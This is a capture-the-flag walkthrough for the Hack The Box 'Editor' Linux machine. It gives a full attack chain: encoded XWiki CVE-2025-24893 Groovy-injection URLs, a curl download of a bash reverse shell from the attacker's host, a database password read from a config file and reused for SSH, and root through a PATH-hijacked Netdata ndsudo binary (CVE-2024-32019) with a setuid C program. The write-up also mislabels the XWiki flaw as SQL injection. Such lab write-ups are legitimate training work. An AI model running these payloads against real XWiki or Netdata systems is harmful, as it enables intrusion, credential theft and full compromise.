> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / LINUX / 2025-12-06

Hack The Box — Editor (Linux)

XWiki exploitation via CVE-2025-24893 grants initial access, credential reuse gives SSH as oliver, then Netdata ndsudo abuse (CVE-2024-32019) leads to root.

Target

  • IP: 10.129.138.178

Port scan

sudo nmap -sC -sV 10.129.138.178 -p- -v

PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp    open     http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
704/tcp   filtered elcsd
3679/tcp  filtered newton-dock
8080/tcp  open     http        Jetty 10.0.20
|_http-open-proxy: Proxy might be redirecting requests
| http-cookie-flags:
|   /:
|     JSESSIONID:
|_      httponly flag not set
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Type: Jetty(10.0.20)
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|_http-server-header: Jetty(10.0.20)
| http-methods:
|   Supported Methods: OPTIONS GET HEAD PROPFIND LOCK UNLOCK
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.129.138.178:8080/xwiki/bin/view/Main/
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
9034/tcp  filtered unknown
13656/tcp filtered unknown
17497/tcp filtered unknown
21764/tcp filtered unknown
22384/tcp filtered unknown
24833/tcp filtered unknown
26502/tcp filtered unknown
28537/tcp filtered unknown
29735/tcp filtered unknown
31739/tcp filtered unknown
47921/tcp filtered unknown
51909/tcp filtered unknown
55377/tcp filtered unknown
58935/tcp filtered unknown
62668/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add editor.htb to /etc/hosts.

Go to http://editor.htb.

We can download two files: simplistcode_1.0.deb and simplistcode_1.0.exe.

ar x simplistcode_1.0.deb
tar xvf data.tar.xz

There is a binary simplistcode.

file simplistcode

usr/local/bin/simplistcode: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fc89f558d158bb1cc6e5e463d6fe7c536da15abb, stripped

Note: it is stripped.

On the site click Docs.

We are redirected to http://wiki.editor.htb/xwiki/.

Add wiki.editor.htb to /etc/hosts.

Go to http://wiki.editor.htb/xwiki.

We see it is XWiki Debian 15.10.8.

There is an SQL injection vulnerability: CVE-2025-24893.

Create a file rev:

bash -i >& /dev/tcp/10.10.15.37/4444 0>&1

Start listeners:

python3 -m http.server 7777
nc -vlnp 4444

Go to:

http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22curl%20http%3A%2F%2F10%2E10%2E15%2E37%3A7777%2Frev%20%2Do%20%2Fdev%2Fshm%2Frev%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

Which corresponds to this command:

curl http://10.10.15.37:7777/rev -o /dev/shm/rev

Then go to:

http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22bash%20%2Fdev%2Fshm%2Frev%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

Which corresponds to this command:

bash /dev/shm/rev

We obtain a reverse shell as user xwiki.

ls -la /home

We notice user oliver.

cat /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml

We notice:

    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSS
L=false&amp;connectionTimeZone=LOCAL&amp;allowPublicKeyRetrieval=true</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>

ssh oliver@editor.htb

Insert password theEd1t0rTeam99.

We obtain a shell.

id

uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)

oliver is in group netdata.

find / -group netdata 2> /dev/null

/opt/netdata

Forward netdata port:

ssh oliver@editor.htb -NL 19999:localhost:19999

Go to http://localhost:19999/.

At top-right there is a notification. Click it.

We discover agent version 1.45.2.

There is a vulnerability: CVE-2024-32019.

PoC reference:

  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
cd /opt/netdata
find . -name ndsudo 2> /dev/null

./usr/libexec/netdata/plugins.d/ndsudo

ls -la ./usr/libexec/netdata/plugins.d/ndsudo

-rwsr-x--- 1 root netdata 200576 Apr  1  2024 ./usr/libexec/netdata/plugins.d/ndsudo

We see SUID bit is active.

Create file getroot.c (also attached as attachments/getroot.c) with content:

#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    system("bash");
}

Compile it:

gcc -o getroot getroot.c

Upload it to victim, for example in /dev/shm, and rename to nvme.

Make it executable if needed:

chmod +x /dev/shm/nvme

Now run:

export PATH=/dev/shm:$PATH
./usr/libexec/netdata/plugins.d/ndsudo nvme-list

We obtain a shell as root.